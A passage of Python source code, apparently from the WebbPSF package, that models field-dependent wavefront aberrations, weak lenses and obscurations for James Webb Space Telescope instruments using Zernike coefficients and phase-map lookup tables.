""" # Rotate zgrid if rot_ang != 0: zgrid = rotate(zgrid, rot_ang, reshape=False, order=1, cval=np.nan) # There will be some NaN's along the border that need to be replaced ind_nan = np.isnan(zgrid) # Remove rows/cols with NaN's xgrid2, ygrid2, zgrid2 = _trim_nan_image(xgrid, ygrid, zgrid) # Create regular grid interpolator function for extrapolation of NaN's func = RegularGridInterpolator((ygrid2,xgrid2), zgrid2, method='linear', bounds_error=False, fill_value=None) # Replace NaNs X, Y = np.meshgrid(xgrid,ygrid) pts = np.array([Y[ind_nan], X[ind_nan]]).transpose() zgrid[ind_nan] = func(pts) # De-rotate clipped zgrid image and redo RegularGridInterpolator if rot_ang != 0: # De-rotate zgrid = rotate(zgrid, -rot_ang, reshape=False, order=1, cval=np.nan) # There will be some NaNs along the border that need to be replaced ind_nan = np.isnan(zgrid) # Remove rows/cols 1 by 1 until no NaNs xgrid2, ygrid2, zgrid2 = _trim_nan_image(xgrid, ygrid, zgrid) # Create regular grid interpolator function for extrapolation of NaN's func = RegularGridInterpolator((ygrid2,xgrid2), zgrid2, method='linear', bounds_error=False, fill_value=None) # Replace NaNs pts = np.array([Y[ind_nan], X[ind_nan]]).transpose() zgrid[ind_nan] = func(pts) return zgrid def _get_initial_pupil_sampling(instrument): """Utility function to retrieve the sampling of the first plane in some optical system. Returns: npix, pixelscale """ # Determine the pupil sampling of the first aperture in the # instrument's optical system if isinstance(instrument.pupil, poppy.OpticalElement): # This branch needed to handle the OTE Linear Model case npix = instrument.pupil.shape[0] pixelscale = instrument.pupil.pixelscale else: # these branches to handle FITS files, by name or as an object if isinstance(instrument.pupil, fits.HDUList): pupilheader = instrument.pupil[0].header else: pupilfile = os.path.join(instrument._datapath, "OPD", instrument.pupil) pupilheader = fits.getheader(pupilfile) npix = pupilheader['NAXIS1'] pixelscale = pupilheader['PUPLSCAL'] * units.meter / units.pixel return npix, pixelscale # Field dependent aberration class for JWST instruments class WebbFieldDependentAberration(poppy.OpticalElement): """ Field dependent aberration generated from Zernikes measured in ISIM CV testing Parameters ----------- include_oversize : bool Explicitly model the 4% oversize for pupil tolerance """ def __init__(self, instrument, include_oversize=False, **kwargs): super(WebbFieldDependentAberration, self).__init__( name="Aberrations", **kwargs ) self.instrument = instrument self.instr_name = instrument.name # work out which name to index into the CV results with, if for NIRCam is_nrc_coron = False # Define NRC coronagraph variable for conciseness if instrument.name == 'NIRCam': channel = instrument.channel[0].upper() lookup_name = "NIRCam{channel}W{module}".format( channel=channel, module=instrument.module ) # Check for coronagraphy; Set is_ncr_coron to True for Lyot pupil mask pupil_mask = self.instrument._pupil_mask is_nrc_coron = (pupil_mask is not None) and ( ('LYOT' in pupil_mask.upper()) or ('MASK' in pupil_mask.upper()) ) elif instrument.name == 'FGS': # 'GUIDER1' or 'GUIDER2' assert instrument.detector in ('FGS1', 'FGS2') lookup_name = 'Guider' + instrument.detector[3] else: lookup_name = instrument.name _log.debug("Retrieving Zernike coefficients for " + lookup_name) self.tel_coords = instrument._tel_coords() # load the Zernikes table here zfile = "si_zernikes_isim_cv3.fits" # Check special case NIRCam coronagraphy if is_nrc_coron: zfile = 
"si_zernikes_coron_wfe.fits" zernike_file = os.path.join(utils.get_webbpsf_data_path(), zfile) if not os.path.exists(zernike_file): raise RuntimeError("Could not find Zernike coefficients file {} \ in WebbPSF data directory".format(zfile)) else: self.ztable_full = Table.read(zernike_file) npix, self.pixelscale = _get_initial_pupil_sampling(self.instrument) self.ztable = self.ztable_full[self.ztable_full['instrument'] == lookup_name] # Figure out the closest field point telcoords_am = self.tel_coords.to(units.arcmin).value v2 = self.ztable['V2'] v3 = self.ztable['V3'] r = np.sqrt((telcoords_am[0] - v2) ** 2 + (telcoords_am[1] - v3) ** 2) closest = np.argmin(r) # Save closest ISIM CV3 WFE measured field point for reference self.row = self.ztable[closest] self.name = "{instrument} internal WFE at V2V3=({v2:.2f},{v3:.2f})', near {field_point}".format( instrument=lookup_name, field_point=self.row['field_point_name'], v2=telcoords_am[0], v3=telcoords_am[1] ) self.si_wfe_type = ("Interpolated", "SI WFE was interpolated between available meas.") # Retrieve those Zernike coeffs # Field point interpolation v2_tel, v3_tel = telcoords_am coeffs = [] for i in range(1, 37): zkey = 'Zernike_{}'.format(i) zvals = self.ztable[zkey] # Cubic interpolation of of non-uniform 2D grid cf = griddata((v2, v3), zvals, (v2_tel, v3_tel), method='cubic').tolist() # Want to perform extrapolation if field point outside of bounds if np.isnan(cf): if i==1: self.si_wfe_type = ("Extrapolated", "SI WFE was extrapolated outside available meas.") # To extrapolate outside the measured field points, we proceed # in two steps. This first creates a fine-meshed cubic fit # over the known field points, fixes any NaN's using # RegularGridInterpolator, then again uses RegularGridInterpolator # on the fixed data to extrapolate the requested field point. # In principle, the first call of RegularGridInterpolator can be # used to extrapolate the requested field point to eliminate # the intermediate step, but this method enables use of all the # real data rather than the trimmed data set. RGI is a rather # quick process, so added overheads should be negligible. # Full field V2/V3 limits for each instrument. # Produces better initial extrapolation with fewer # interpolation artifacts in RGI. if lookup_name == 'Guider1': v2_min, v2_max, v3_min, v3_max = (2.2, 4.7, -12.9, -10.4) elif lookup_name == 'Guider2': v2_min, v2_max, v3_min, v3_max = (-0.8, 1.6, -12.9, -10.4) elif lookup_name == 'NIRISS': v2_min, v2_max, v3_min, v3_max = (-6.0, -3.6, -12.9, -10.4) elif lookup_name == 'MIRI': v2_min, v2_max, v3_min, v3_max = (-8.3, -6.1, -7.3, -5.2) elif lookup_name == 'NIRSpec': v2_min, v2_max, v3_min, v3_max = (3.7, 9.0, -9.8, -4.5) elif (lookup_name == 'NIRCamLWA') or (lookup_name == 'NIRCamSWA'): v2_min, v2_max, v3_min, v3_max = (0.2, 2.7, -9.5, -7.0) elif (lookup_name == 'NIRCamLWB') or (lookup_name == 'NIRCamSWB'): v2_min, v2_max, v3_min, v3_max = (-2.7, -0.2, -9.5, -7.0) else: v2_min, v2_max, v3_min, v3_max = (v2.min(), v2.max(), v3.min(), v3.max()) # For NIRCam coronagraphy, add 50" to V3 limits if is_nrc_coron: v3_min += 50. / 60. v3_max += 50. / 60. # Create fine mesh grid dstep = 1. / 60. 
# 1" steps xgrid = np.arange(v2_min, v2_max+dstep, dstep) ygrid = np.arange(v3_min, v3_max+dstep, dstep) X, Y = np.meshgrid(xgrid,ygrid) # Cubic interpolation of all points # Will produce a number of NaN's that need to be extrapolated over zgrid = griddata((v2, v3), zvals, (X, Y), method='cubic') # Want to rotate zgrid image of some SIs to minimize NaN clipping if 'NIRSpec' in lookup_name: rot_ang = 43 elif 'MIRI' in lookup_name: rot_ang = -5 elif 'NIRISS' in lookup_name: rot_ang = 2 else: rot_ang = 0 # Fix the NaN's within zgrid array # Perform specified rotation for certain SIs # Trim rows/cols zgrid = _fix_zgrid_NaNs(xgrid, ygrid, zgrid, rot_ang=rot_ang) # Create final function for extrapolation func = RegularGridInterpolator((ygrid,xgrid), zgrid, method='linear', bounds_error=False, fill_value=None) # Extrapolate at requested (V2,V3) coordinates cf = func( (v3_tel, v2_tel) ).tolist() coeffs.append(cf) self.zernike_coeffs = coeffs # Generate an OPD on the same sampling as the input wavefront - # but implicitly inverted in coordinate system # to match the OTE exit pupil orientation if include_oversize: # Try to model the oversized gaps around the internal pupils. # This is only relevant if you are trying to model pupil shear or rotations, # and in general we don't have good WFE data outside the nominal pupil anyway # so let's leave this detail off by default. # internal pupils for NIRISS and MIRI instruments are 4 percent # oversized tricontagons if self.instrument.name == "NIRISS": self.amplitude = fits.getdata(os.path.join( utils.get_webbpsf_data_path(), 'tricontagon_oversized_4pct.fits.gz') ) # cut out central region to match the OPD, which is hard coded # to 1024 self.amplitude = self.amplitude[256:256 + 1024, 256:256 + 1024] elif self.instrument.name == "MIRI": self.amplitude = fits.getdata(os.path.join( utils.get_webbpsf_data_path(), 'MIRI', 'optics', 'MIRI_tricontagon_oversized_rotated.fits.gz') ) else: # internal pupil is a 4 percent oversized circumscribing circle? # For NIRCam: # John stansberry 2016-09-07 reports "It is definitely oversized, but isn't really # circular... Kinda vaguely 6-sided I guess. [...] I can dig up # a drawing and/or some images that show the pupil stop." y, x = np.indices((npix, npix), dtype=float) y -= (npix - 1) / 2.0 x -= (npix - 1) / 2.0 r = np.sqrt(y ** 2 + x ** 2) self.amplitude = (r < (npix - 1) / 2.0 * 1.04).astype(int) self.opd = poppy.zernike.opd_from_zernikes( coeffs, npix=npix, aperture=self.amplitude, outside=0 ) else: self.opd = poppy.zernike.opd_from_zernikes( coeffs, npix=npix, outside=0 ) self.amplitude = (self.opd != 0).astype(int) def header_keywords(self): """ Return info we would like to save in FITS header of output PSFs """ from collections import OrderedDict keywords = OrderedDict() keywords['SIWFETYP'] = self.si_wfe_type keywords['SIWFEFPT'] = (self.row['field_point_name'], "Closest ISIM CV3 WFE meas. field point") for i in range(1, 36): keywords['SIZERN{}'.format(i)] = (self.zernike_coeffs[i - 1], "[m] SI WFE coeff for Zernike term {}".format(i)) return keywords # wrapper just to change default vmax def display(self, *args, **kwargs): if 'opd_vmax' not in kwargs: kwargs.update({'opd_vmax': 2.5e-7}) return super(WebbFieldDependentAberration, self).display(*args, **kwargs) class NIRSpecFieldDependentAberration(WebbFieldDependentAberration): """ Subclass that adds to the above the division into fore-optics and spectrograph optics for NIRSpec. 
The available end-to-end optical test data for NIRSpec from ISIM CV3 do not allow distinguishing which optical planes have which amounts of aberration. However, the NIRSpec team performed extensive metrology during the assembly of NIRSpec FM2, both of individual components and of the assembled system using a shack hartmann WFS temporarily placed within the optical system. [should add document number here to the report with those data!] Based on those data, Maurice Te Plate recommended to Marshall Perrin that the CV3 WFE should be apportioned 1/3 to the fore-optics and 2/3 to the spectrograph optics (collimator & camera). Given the uncertainties and available data that seems sufficiently precise for current purposes. """ def __init__(self, instrument, where='fore', **kwargs): super(NIRSpecFieldDependentAberration, self).__init__(instrument, **kwargs) if where == 'fore': self.name = 'NIRSpec fore-optics WFE, near {}'.format(self.row['field_point_name']) self.scalefactor = 1. / 3 else: self.name = 'NIRSpec spectrograph WFE, near {}'.format(self.row['field_point_name']) self.scalefactor = 2. / 3 # apply scale factor to split up the OPD, and that's all we need to do. self.opd *= self.scalefactor class NIRCamFieldAndWavelengthDependentAberration(WebbFieldDependentAberration): """ Subclass that adds to the above the wavelength dependent variation in defocus for NIRCam. The model for this is based on NIRCam models and ISIM CV2 test data, as provided by Randal Telfer to Marshall Perrin. It uses a combination of model design predictions continuously at all wavelengths based on the properties of the glasses in the refractive optical design, plus some small tweaks to achieve better agreement with the CV test measurements of defocus at a small subset of wavelengths. """ def __init__(self, instrument, **kwargs): super( NIRCamFieldAndWavelengthDependentAberration, self).__init__( instrument, **kwargs) # Polynomial equations fit to defocus model. Wavelength-dependent focus # results should correspond to Zernike coefficients in meters. # Fits were performed to the SW and LW optical design focus model # as provided by Randal Telfer. # See plot at https://github.com/spacetelescope/webbpsf/issues/179 # The relative wavelength dependence of these focus models are very # similar for coronagraphic mode in the Zemax optical prescription, # so we opt to use the same focus model in both imaging and coronagraphy. defocus_to_rmswfe = -1.09746e7 # convert from mm defocus to meters (WFE) sw_focus_cf = np.array([-5.169185169, 50.62919436, -201.5444129, 415.9031962, -465.9818413, 265.843112, -59.64330811]) / defocus_to_rmswfe lw_focus_cf = np.array([0.175718713, -1.100964635, 0.986462016, 1.641692934]) / defocus_to_rmswfe self.fm_short = np.poly1d(sw_focus_cf) self.fm_long = np.poly1d(lw_focus_cf) # Coronagraphic tilt (`ctilt`) offset model # Primarily effects the LW channel (approximately a 0.031mm diff from 3.5um to 5.0um). # SW module is small compared to LW, but we include it for completeness. # Values have been determined using the Zernike offsets as reported in the # NIRCam Zemax models. 
The center reference positions will correspond to the # NIRCam target acquisition filters (3.35um for LW and 2.1um for SW) sw_ctilt_cf = np.array([125.849834, -289.018704]) / 1e9 lw_ctilt_cf = np.array([146.827501, -2000.965222, 8385.546158, -11101.658322]) / 1e9 self.ctilt_short = np.poly1d(sw_ctilt_cf) self.ctilt_long = np.poly1d(lw_ctilt_cf) # Get the representation of focus in the same Zernike basis as used for # making the OPD. While it looks like this does more work here than needed # by making a whole basis set, in fact because of caching behind the scenes # this is actually quick basis = poppy.zernike.zernike_basis_faster( nterms=len(self.zernike_coeffs), npix=self.opd.shape[0], outside=0 ) self.defocus_zern = basis[3] self.tilt_zern = basis[2] def get_opd(self, wave): """ Parameters ---------- wave : float or obj either a scalar wavelength (meters) or a Wavefront object """ if isinstance(wave, poppy.Wavefront): wavelength = wave.wavelength else: wave = poppy.Wavefront(wavelength=float(wave)) wavelength = wave.wavelength # Check for coronagraphy pupil_mask = self.instrument._pupil_mask is_nrc_coron = (pupil_mask is not None) and ( ('LYOT' in pupil_mask.upper()) or ('MASK' in pupil_mask.upper()) ) # Which wavelength was used to generate the OPD map we have already # created from zernikes? if self.instrument.channel.upper() == 'SHORT': focusmodel = self.fm_short opd_ref_wave = 2.12 opd_ref_focus = focusmodel(opd_ref_wave) else: focusmodel = self.fm_long opd_ref_wave = 3.23 # All LW WFE measurements were made using F323N, # which has it's own focus that deviates from focusmodel(). # But only do this for direct imaging SI WFE values, # because coronagraph WFE was measured in Zemax (no additional focus power). if is_nrc_coron: opd_ref_focus = focusmodel(opd_ref_wave) else: opd_ref_focus = 1.206e-7 # Not coronagraphy (e.g., imaging) # If F323N or F212N, then no focus offset necessary wave_um = wavelength.to(units.micron).value if ('F323N' in self.instrument.filter) or ('F212N' in self.instrument.filter): deltafocus = 0 else: deltafocus = focusmodel(wave_um) - opd_ref_focus _log.info(" Applying OPD focus adjustment based on NIRCam focus vs wavelength model") _log.info(" Modified focus from {} to {} um: {:.3f} nm wfe".format( opd_ref_wave, wave_um, -deltafocus * 1e9) ) # Apply defocus mod_opd = self.opd - deltafocus * self.defocus_zern # Apply wavelength-dependent tilt offset for coronagraphy # We want the reference wavelength to be that of the target acq filter # Final offset will position TA ref wave at the OPD ref wave location # (wave_um - opd_ref_wave) - (ta_ref_wave - opd_ref_wave) = wave_um - ta_ref_wave if is_nrc_coron: if self.instrument.channel.upper() == 'SHORT': ctilt_model = self.ctilt_short ta_ref_wave = 2.10 else: ctilt_model = self.ctilt_long ta_ref_wave = 3.35 tilt_offset = ctilt_model(wave_um) - ctilt_model(ta_ref_wave) _log.info(" Applying OPD tilt adjustment based on NIRCam tilt vs wavelength model") _log.info(" Modified tilt from {} to {} um: {:.3f} nm wfe".format( ta_ref_wave, wave_um, tilt_offset * 1e9) ) # Apply tilt offset mod_opd = mod_opd + tilt_offset * self.tilt_zern rms = np.sqrt((mod_opd[mod_opd != 0] ** 2).mean()) _log.info(" Resulting OPD has {:.3f} nm rms".format(rms * 1e9)) return mod_opd class MIRIFieldDependentAberrationAndObscuration(WebbFieldDependentAberration): """ Subclass that adds to the above the field dependent obscuration from the MIRI internal calibration source pickoff mirror. 
The model for this was derived by Randal Telfer based on the optical model file OTE_MIRI_20150223.seq, provided by Scott Rohrbach. In this case we do turn on by default the tricontagon outline since we have to worry about pupil shape anyway. """ def __init__(self, instrument, include_oversize=True, **kwargs): super(MIRIFieldDependentAberrationAndObscuration, self).__init__( instrument, include_oversize=include_oversize, **kwargs ) # figure out the XAN, YAN coordinates in degrees, # since that is what Randal's linear model expects xanyan = instrument._xan_yan_coords().to(units.degree) xan = xanyan[0].value yan = xanyan[1].value # Telfer: # Here is the matrix that reproduces the projection of the # obscuration on the primary mirror, V2-V3 coordinates and # radius in mm, as a function of XAN,YAN in degrees. # So, V2 is: # # V2 = -20882.636 * XAN -680.661 * YAN - 1451.682. # # XAN YAN Const # V2 -20882.636 -680.661 -1451.682 # V3 815.955 26395.552 -2414.406 # Rad 176.864 -392.545 626.920 # we implement the above here, and convert the outputs to meters: self.obsc_v2 = (-20882.636 * xan - 680.661 * yan - 1451.682) * 0.001 self.obsc_v3 = (815.955 * xan + 26395.552 * yan - 2414.406) * 0.001 self.obsc_r = (176.864 * xan - 392.545 * yan + 626.920) * 0.001 # generate coordinates. N.B. this assumed hard-coded pixel scale and # array size. pixel_scale = constants.JWST_CIRCUMSCRIBED_DIAMETER / 1024 y, x = poppy.Wavefront.pupil_coordinates((1024, 1024), pixel_scale) # Now, the v2 and v3 coordinates calculated above are as projected back to # the OTE entrance pupil # But the OTE exit pupil as seen at the MIRI internal pupil is rotated by # 5 degrees with respect to that, and flipped in handedness as well # (but only in V3, given webbpsf axes conventions relative to the definition of the V frame) # Therefore we must transform the v2 and v3 to match the wavefront coords at the # intermediate plane. angle = np.deg2rad(instrument._rotation) proj_v2 = np.cos(angle) * self.obsc_v2 - np.sin(angle) * self.obsc_v3 proj_v3 = -np.sin(angle) * self.obsc_v2 + np.cos(angle) * self.obsc_v3 # handle V3 flip from OTE entrance to exit pupils # no flip needed for V2 since that's already implicitly done between # the V frame looking "in" to the OTE vs WebbPSF simulations looking # "out" from the detector toward the sky. proj_v3 *= -1 mask = np.sqrt((y - proj_v3) ** 2 + (x - proj_v2) ** 2) < self.obsc_r self.amplitude[mask] = 0 # No need to subclass any of the methods; it's sufficient to set the custom # amplitude mask attribute value. # Alternative implementation that just reads OPDs from some file class LookupTableFieldDependentAberration(poppy.OpticalElement): """ Retrieve OPDs from a lookup table over many field points. This is pretty much a hack, hard-coded for a specific data delivery from Ball! Intended for OTE team WFR4 and MIMF KDP Practice data prep, not generalized beyond that. Parameters ----------- add_niriss_defocus: bool add 0.8 microns PTV defocus to NIRISS only (for WFR4 test) rm_ptt: bool Remove piston, tip, tilt rm_center_ptt : bool If rm_ptt, use the center value for each detector rather than per field point nwaves: float Number of waves to defocus SM, if add_sm_defocus_pos or add_sm_defocus_neg is True. add_sm_defocus: bool If True, add "nwaves" of SM defocus, measured at a reference wavelength of 2.0 microns. 
Usage: ------ inst = webbpsf.NIRCam() # or any other SI inst._si_wfe_class = LookupTableFieldDependentAberration() """ def __init__(self, instrument, field_points_file=None, phasemap_file=None, which_exercise='MIMF_KDP_2', add_niriss_defocus=None, rm_ptt=None, rm_center_ptt=None, add_mimf_defocus=False, add_sm_defocus=False, nwaves=None, **kwargs): super().__init__( name="Aberrations", **kwargs ) import warnings self.instrument = instrument self.instr_name = instrument.name self.instrument.pupilopd=None # Do not add in the usual telescope WFE on top of this; # This model provided by Ball includes both the telescope and the SI WFE combined. self.rm_ptt = rm_ptt self.which_exercise = which_exercise if self.which_exercise == 'WFR4': add_niriss_defocus=True rm_ptt = True rm_center_ptt = True elif self.which_exercise == 'MIMF_KDP': add_niriss_defocus=False rm_ptt = False rm_center_ptt = False elif self.which_exercise == 'LRE4' or self.which_exercise == 'LRE4-OTE26': add_niriss_defocus=False rm_ptt = False rm_center_ptt = False elif self.which_exercise == 'MIMF_KDP_2': add_niriss_defocus=False rm_ptt = False rm_center_ptt = False if self.instr_name =='NIRCam': self.instr_name += " "+self.instrument.module elif self.instr_name == 'FGS': self.instr_name = self.instrument.detector self.tel_coords = instrument._tel_coords() # load the OPD lookup map table (datacube) here import webbpsf.constants if self.which_exercise == 'WFR4': fp_path = '/ifs/jwst/tel/wfr4_mirage_sims/phase_maps_from_ball/' if field_points_file is None: field_points_file = fp_path + 'The_Field_Coordinates.txt' if phasemap_file is None: phasemap_file = fp_path + 'phase_maps.fits' self.phasemap_file = phasemap_file self.table = Table.read(field_points_file, format='ascii', names=('V2', 'V3')) self.yoffset = -7.8 self.table['V3'] += self.yoffset # Correct from -YAN to actual V3 self.phasemaps = fits.getdata(phasemap_file) self.phasemap_pixelscale = webbpsf.constants.JWST_CIRCUMSCRIBED_DIAMETER/256 * units.meter / units.pixel resample = True elif self.which_exercise == 'MIMF_KDP': fp_path = '/ifs/jwst/tel/MIMF_KDP_Practice/Ball_Phase_Maps/' field_points_file = fp_path + 'coordinates.txt' self.table = Table.read(field_points_file, format='ascii.basic', names=('XWAS', 'YWAS')) # Convert coordinate table to V2V3 in arcminutes self.table['V2'] = -self.table['XWAS'] self.table['V3'] = self.table['YWAS'] - 468/60 phasemap_file = fp_path + 'all_26Feb2021.fits' self.phasemaps = fits.getdata(phasemap_file) self.phasemaps = self.phasemaps.reshape(7*11*11, 256, 256) self.phasemap_pixelscale = webbpsf.constants.JWST_CIRCUMSCRIBED_DIAMETER / 256 * units.meter / units.pixel resample = True elif self.which_exercise == 'LRE4' or self.which_exercise == 'LRE4-OTE26': fp_path = '/ifs/jwst/tel/LRE4/from_ball/' if self.which_exercise == 'LRE4': field_points_file = fp_path + 'coordinates.ecsv' phasemap_file = fp_path + 'rescaled_opds_for_OTE-25.2.fits' elif self.which_exercise == 'LRE4-OTE26': field_points_file = fp_path + 'coordinates-ote26.ecsv' phasemap_file = fp_path + 'rescaled_opds_for_OTE-26.fits' self.table = Table.read(field_points_file) self.phasemaps = fits.getdata(phasemap_file) # Phase maps have been pre-zoomed in this case by the import notebook resample = False self.phasemap_pixelscale = webbpsf.constants.JWST_CIRCUMSCRIBED_DIAMETER / 1024 * units.meter / units.pixel elif self.which_exercise == 'MIMF_KDP_2': fp_path = '/ifs/jwst/tel/MIMF_KDP_Practice_Sept2021/Ball_Phase_Maps/' # Convert coordinate table to V2V3 in arcminutes xcoords = 
fits.getdata(fp_path+"xcor.fits") ycoords = fits.getdata(fp_path+"ycor.fits") V2 = -xcoords.flatten() V3 = ycoords.flatten() - 468/60 self.table = Table([V2,V3], names=['V2','V3']) phasemap_file = fp_path + 'complete_wf.fits' self.phasemaps = fits.getdata(phasemap_file) self.phasemaps = self.phasemaps.reshape(7*11*11, 256, 256) self.phasemap_pixelscale = webbpsf.constants.JWST_CIRCUMSCRIBED_DIAMETER / 256 * units.meter / units.pixel resample = True self.phasemap_file = phasemap_file # Determine the pupil sampling of the first aperture in the # instrument's optical system if isinstance(instrument.pupil, poppy.OpticalElement): # This branch needed to handle the OTE Linear Model case self.pixelscale = instrument.pupil.pixelscale else: # these branches to handle FITS files, by name or as an object if isinstance(instrument.pupil, fits.HDUList): pupilheader = instrument.pupil[0].header else: pupilfile = os.path.join(instrument._datapath, "OPD", instrument.pupil) pupilheader = fits.getheader(pupilfile) self.pixelscale = pupilheader['PUPLSCAL'] * units.meter / units.pixel # Figure out the closest field point telcoords_am = self.tel_coords.to(units.arcmin).value print(f"Requested field point has coord {telcoords_am}") v2 = self.table['V2'] v3 = self.table['V3'] r = np.sqrt((telcoords_am[0] - v2) ** 2 + (telcoords_am[1] - v3) ** 2) closest = np.argmin(r) # if there are two field points with identical coords or equal distance just one is returned print(f"Closest field point is row {closest}:\n{self.table[closest]}") # Save closest ISIM CV3 WFE measured field point for reference self.row = self.table[closest] self.name = "{instrument} at V2V3=({v2:.2f},{v3:.2f}) Lookup table WFE from ({v2t:.2f},{v3t:.2f})".format( instrument=self.instr_name, v2=telcoords_am[0], v3=telcoords_am[1], v2t=self.row['V2'], v3t=self.row['V3'] ) self.si_wfe_type = ("Lookup Table", "SI + OTE WFE from supplied lookup table of phase maps.") # Retrieve the phase map phasemap = self.phasemaps[closest] # The phase maps are provided in OTE entrance pupil orientation, however we need it to be # in exit pupil orientation, so flip it vertically here. phasemap = phasemap[::-1] print("Flipped input phase map vertically into exit pupil orientation.") if resample: if phasemap.shape[0] != 256: raise NotImplementedError("Hard coded for Ball delivery of 256 pixel phase maps") # Resample to 1024 across, by replicating each pixel into a 4x4 block resample_factor = 4 phasemap_big = np.kron(phasemap, np.ones((resample_factor,resample_factor))) else: # no resampling / zooming needed phasemap_big = phasemap self.opd = phasemap_big * 1e-6 # Convert from microns to meters self.amplitude = np.ones_like(self.opd) if rm_ptt: apmask = self.opd != 0 if rm_center_ptt: # Remove the PTT values at the center of each instrument, rather than per field point. This # leaves in the field dependence but takes out the bulk offset # These values are just a precomputed lookup table of the coefficients returned by the # opd_expand_nonorthonormal call just below, for the center field point on each. 
coeffs_per_si = {"NIRCam A": [-3.50046880e-10, -7.29120639e-08, -1.39751567e-08], "NIRCam B": [-2.45093780e-09, -2.51804001e-07, -2.64821753e-07], "NIRISS": [-1.49297771e-09, -2.11111038e-06, -3.99881993e-07], "FGS1": [ 9.86180620e-09, -5.94041500e-07, 1.18953161e-06], "FGS2": [ 4.84327424e-09, -8.24285481e-07, 5.09791593e-07], "MIRI": [-8.75766849e-09, -1.27850277e-06, -1.03467567e-06],} coeffs = coeffs_per_si[self.instr_name] else: coeffs = poppy.zernike.opd_expand_nonorthonormal(self.opd, aperture=apmask, nterms=3) ptt_only = poppy.zernike.opd_from_zernikes(coeffs, aperture=apmask, npix=self.opd.shape[0], outside=0) self.opd -= ptt_only print(f"Removing piston, tip, tilt from the input wavefront. Coeffs for {self.instr_name}: {coeffs},") if add_mimf_defocus: self.instrument.options['defocus_waves'] = 0.8 self.instrument.options['defocus_wavelength'] = 1e-6 # Add 0.8 microns PTV defocus if add_niriss_defocus and self.instr_name=='NIRISS': # The Ball delivery was supposed to have defocused NIRISS for rehearsal purposes, but didn't. # So fix that here. self.instrument.options['defocus_waves'] = 0.8 self.instrument.options['defocus_wavelength'] = 1e-6 # Add 0.8 microns PTV defocus warnings.warn("Adding defocus=0.8 waves for NIRISS!") if add_sm_defocus: if nwaves: print("ADDING DEFOCUS {:4.1f} WAVES at 2.0 microns".format(nwaves)) self.instrument.options['defocus_waves'] = nwaves self.instrument.options['defocus_wavelength'] = 2.0e-6 else: print("Not adding any defocus; set nwaves") def header_keywords(self): """ Return info we would like to save in FITS header of output PSFs """ from collections import OrderedDict keywords = OrderedDict() keywords['SIWFETYP'] = self.si_wfe_type keywords['SIWFEFPT'] = ( f"{self.row["V2"]:.3f}, {self.row["V3"]:.3f}", "Closest lookup table meas. field point") keywords['SIWFEFIL'] = self.phasemap_file return keywords # wrapper just to change default vmax def display(self, *args, **kwargs): if 'opd_vmax' not in kwargs: kwargs.update({'opd_vmax': 2.5e-7}) return super().display(*args, **kwargs) class NIRCamFieldDependentWeakLens(poppy.OpticalElement): """Higher-fidelity model of NIRCam weak lens(es), based on calibrated as-built performance and field dependence. Includes field-dependent variations in defocus power, and in astigmatism. Includes variation of the +4 lens' effective OPD when used in a pair with either the +8 or -8 lens. These are modeled as the specific values from the nearest neighbor ISIM CV calibration point, with no interpolation between them included at this time. See R. Telfer, 'NIRCam Weak Lens Characterization and Performance', JWST-REF-046515 Parameters ----------- name : str WLP8, WLM8, WLP4, WLM4, WLP12. center_fp_only : bool For debugging; override to set no field dependence and just use the average center field point power include_power, include_astigmatism : bool Can be used to selectively enable/disable parts of the optical model. Intended for debugging; should no need to be set by users in general. 
""" def __init__(self, name='WLP8', instrument=None, center_fp_only=False, verbose=False, include_power=True, include_astigmatism=True, **kwargs): super().__init__(name=name) self.ref_wavelength = 2.12e-6 # reference wavelength for defocus self.verbose = verbose if instrument is None: self.module = 'A' self.v2v3_coords = (0, -468 / 60) npix = 1024 else: self.module = instrument.module self.v2v3_coords = instrument._tel_coords() npix, pixelscale = _get_initial_pupil_sampling(instrument) self.ztable_full = None ## REFERENCE: # NIRCam weak lenses, values from WSS config file, PRDOPSFLT-027 # A B # WLP4_diversity = 8.27309 8.3443 diversity in microns # WLP8_diversity = 16.4554 16.5932 # WLM8_diversity = -16.4143 -16.5593 # WL_wavelength = 2.12 Wavelength, in microns if center_fp_only or instrument is None: # use the center field point power only. No field dependence # Power in P-V waves at center field point in optical model # JWST-REF-046515, table 2 Mod A: Mod B: power_at_center_fp = {'WLM8': (-8.0188, -7.9521), 'WLM4': (-4.0285, -3.9766), 'WLP4': (3.9797, 3.9665), 'WLP8': (8.0292, 7.9675), 'WLP12': (12.0010, 11.9275)} power_pv = power_at_center_fp[self.name][0 if self.module == 'A' else 1] astig0 = 0 astig45 = 0 else: closest_fp = self.find_closest_isim_fp_name(instrument) if verbose: print(closest_fp) power_pv, astig0, astig45 = self.lookup_empirical_lens_power(name, closest_fp) self.power_pv_waves = power_pv pv2rms_norm = self.ref_wavelength / (2 * np.sqrt(3)) # convert desired PV waves to RMS microns for power # since the below function wants inputs in RMS self.power_rms_microns = power_pv * pv2rms_norm zernike_coefficients = np.zeros(6) if include_power: zernike_coefficients[3] = self.power_rms_microns if include_astigmatism: zernike_coefficients[4] = astig0 zernike_coefficients[5] = astig45 self.zernike_coefficients = zernike_coefficients self.opd = poppy.zernike.opd_from_zernikes( zernike_coefficients, npix=npix, outside=0 ) self.amplitude = np.ones_like(self.opd) def find_closest_isim_fp_name(self, instr): """Find the closest ISIM CV field point to a given instrument object, i.e. 
        the field point closest to the configured detector and coordinates.
        """
        if self.ztable_full is None:
            zernike_file = os.path.join(utils.get_webbpsf_data_path(), "si_zernikes_isim_cv3.fits")
            self.ztable_full = Table.read(zernike_file)

        lookup_name = f"NIRCam{instr.channel.upper()[0]}W{instr.module}"
        ztable = self.ztable_full[self.ztable_full['instrument'] == lookup_name]
        self._ztable = ztable
        self._instr = instr
        telcoords_am = instr._tel_coords().to(units.arcmin).value
        if self.verbose:
            print(telcoords_am)
        r = np.sqrt((telcoords_am[0] - ztable['V2']) ** 2 + (telcoords_am[1] - ztable['V3']) ** 2)

        # Save closest ISIM CV3 WFE measured field point for reference.
        # Use argmin so we get a single Row (and thus a scalar field point name)
        # even if two field points happen to be exactly equidistant.
        row = ztable[np.argmin(r)]
        return row['field_point_name']

    def lookup_empirical_lens_power(self, lens_name, field_point_name):
        """ Lookup lens power and astigmatism versus field position, from
        empirical calibrations from ISIM CV testing """
        mypath = os.path.dirname(os.path.abspath(__file__)) + os.sep
        wl_data_file = os.path.join(mypath, 'otelm', 'NIRCam_WL_Empirical_Power.csv')
        wl_data = Table.read(wl_data_file, comment='#', header_start=1)

        field_point_row = wl_data[wl_data['Field'] == field_point_name]
        if self.verbose:
            print(field_point_row)
        defocus_name = lens_name[2:]
        power = field_point_row[defocus_name].data[0]

